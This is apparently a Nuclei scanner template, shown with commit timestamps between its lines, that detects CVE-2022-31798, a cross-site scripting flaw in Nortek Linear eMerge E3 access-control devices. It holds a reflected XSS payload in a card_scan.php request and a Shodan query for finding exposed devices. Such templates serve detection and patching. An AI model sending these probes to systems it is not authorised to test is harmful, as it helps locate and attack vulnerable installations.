2022-08-12 11:31:04 +00:00
id : CVE-2022-31798
info :
2022-09-09 17:34:37 +00:00
name : Nortek Linear eMerge E3-Series - Cross-Site Scripting
2022-08-12 11:31:04 +00:00
author : ritikchaddha
2022-10-10 19:40:25 +00:00
severity : medium
2022-08-12 11:31:04 +00:00
description : |
2022-10-10 19:22:59 +00:00
There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
2022-08-12 11:31:04 +00:00
reference :
- https://packetstormsecurity.com/files/167992/
2022-08-26 08:13:09 +00:00
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31798
2022-08-29 13:55:23 +00:00
classification :
2022-10-10 19:40:25 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-10-10 19:22:59 +00:00
cve-id : CVE-2022-31798
2022-10-10 19:40:25 +00:00
cwe-id : CWE-79
2022-08-12 11:31:04 +00:00
metadata :
shodan-query : http.title:"eMerge"
2022-08-26 08:13:09 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : cve2022,emerge,nortek,xss,packetstorm,cve
2022-08-12 11:31:04 +00:00
requests :
- method : GET
path :
2022-08-13 00:01:54 +00:00
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
2022-08-12 11:31:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-08-13 00:01:54 +00:00
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
2022-08-12 11:31:04 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-10-10 19:22:59 +00:00
# Enhanced by cs 09/29/2022